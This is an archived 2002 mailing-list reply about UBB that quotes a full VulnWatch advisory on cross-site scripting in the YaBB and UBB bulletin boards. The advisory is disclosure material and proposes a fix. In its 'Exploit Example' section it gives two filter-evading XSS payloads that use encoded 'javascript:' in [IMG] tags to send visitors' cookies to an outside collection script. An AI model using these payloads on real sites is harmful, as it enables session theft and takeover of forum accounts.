OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
 
From: Raymond Vrolijk (raymond.vrolijkveronica.nl)
Date: Thu Jan 17 2002 - 05:25:36 CST

  • Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

    Hi,

    Now talking about UBB.. I found out that when I add an Insert Header meta
    tag
    in UBB's control panel, it is added twice....
    How come?

    Greetings from Holland,

    Raymond Vrolijk
    Programmer
    http://www.veronica.nl

    ----- Original Message -----
    From: "Obscure" <obscureeyeonsecurity.net>
    To: <vulnwatchvulnwatch.org>
    Sent: Wednesday, January 09, 2002 6:35 PM
    Subject: [VulnWatch] CSS vulnerabilities in YaBB and UBB allow account
    hijack [Multiple Vendor]

    > Advisory Title: CSS vulnerabilities in YaBB and UBB allow account hijack
    > [Multiple Vendor]
    > Release Date: 08/01/2002
    >
    > Application: YaBB and UBB
    >
    >
    > Platform: Any system supporting PERL.
    >
    > Build -
    > YaBB : 1 Gold - Service Pack 1 - older versions were effected in the same
    > way.
    > UBB : Ultimate Bulletin BoardTM 6.2.0 Beta Release 1.0
    >
    >
    > Severity: Malicious users can steal session cookies, allowing
    administrative
    > access to the bulletin board.
    >
    > Author:
    > Obscure^
    > [ obscureeyeonsecurity.net ]
    >
    > Vendor Status:
    > YaBB - Informed on 01 Jan 2002, should fix some time in the future ...
    > UBB - Informed on 08 Jan 2002, should issue a fix on 09 Jan 2002 (seems
    like
    > they knew about the issue).
    >
    > Web:
    >
    > http://yabb.xnull.com
    > http://www.infopop.com/products/ubb/
    > http://eyeonsecurity.net/advisories/css_in_yabb_and_ubb.html
    >
    >
    > Background.
    >
    > (extracted from
    > http://yabb.xnull.com)
    >
    > YaBB is a leading provider of FREE, downloadable Perl forums for
    webmasters,
    > with currently over 50,000 web communities using YaBB worldwide, and over
    1
    > million registered users througout these forums! Join the messaging
    > revolution;
    > keep visitors coming back....
    >
    > (extracted from
    > http://www.infopop.com/products/ubb/)
    > The Ultimate Bulletin Board (UBB)T is the most widely adopted Perl message
    > board on
    > the Web. With a solid five year development history, and worldwide
    > familiarity, it is easy to
    > use and maintain.
    >
    > Problem.
    >
    > When a user inserts [IMG]url[/IMG], YaBB changes that text to <img
    > src='url'>.
    > If someone inserts javascript:alert() instead of the url, the javascript
    > code
    > is executed by Internet Explorer or some other web browsers. This allows
    > stealing
    > of cookie data and other interesting things. YaBB has filtered the
    > javascript
    > method, however it does not take into consideration that javascript: can
    be
    > encoded using standard HTML hex and ASCII encoding. Same with UBB.
    > In UBB I need to encode several strings because they added checking for
    > certain
    > keywords such as cookie.
    > In my example I change javascript: to javascr&#x69;pt:
    >
    >
    > Exploit Example.
    >
    > Inserting a new topic (or reply) with the following text will send
    visitor's
    > cookies
    > to Eye on Security. The output is saved to
    > http://eyeonsecurity.net/tools/cookies.txt .
    > Cookies will contain the password in the case of UBB and a session cookie
    > (or encoded
    > password) in YaBB.
    >
    > -- snap YaBB --
    >
    > [img]javascr&#x69;pt:document.write
    > ('&#x3cimg
    >
    src=&#x68;tt&#x70;://eyeonsecurity.net/tools/cookie.plx?cookie='+escape(docu
    > ment.cookie)+'&#x3e')
    > [/img].
    >
    > -- snap YaBB --
    >
    > -- snap UBB --
    >
    > [IMG]javascr&#x69;pt:document.wr&#x69;te
    > &#x28;'<img%20src=&#x68;tt&#x70;://eyeonsecurity.net/tools/cookie.plx?
    >
    > cookie='+escape&#x28;document.cook&#x69;e&#x29;+'>'&#x29;
    > [/IMG]
    >
    > -- snap UBB --
    >
    >
    > Fix.
    >
    > IMG tags should start with http, so that Javascript: and other goodies
    (play
    > with mailto:)
    > are not allowed.
    >
    >
    > Note.
    >
    > Other Bulletin Board Systems may also be vulnerable to these attacks.
    >
    >
    > Disclaimer.
    >
    > The information within this document may change without notice. Use of
    > this information constitutes acceptance for use in an AS IS
    > condition. There are NO warranties with regard to this information.
    > In no event shall the author be liable for any consequences whatsoever
    > arising out of or in connection with the use or spread of this
    > information. Any use of this information lays within the user's
    > responsibility.
    >
    >
    > Feedback.
    >
    > Please send suggestions, updates, and comments to:
    >
    > Eye on Security
    > mail : obscureeyeonsecurity.net
    > web : http://www.eyeonsecurity.net
    >
    >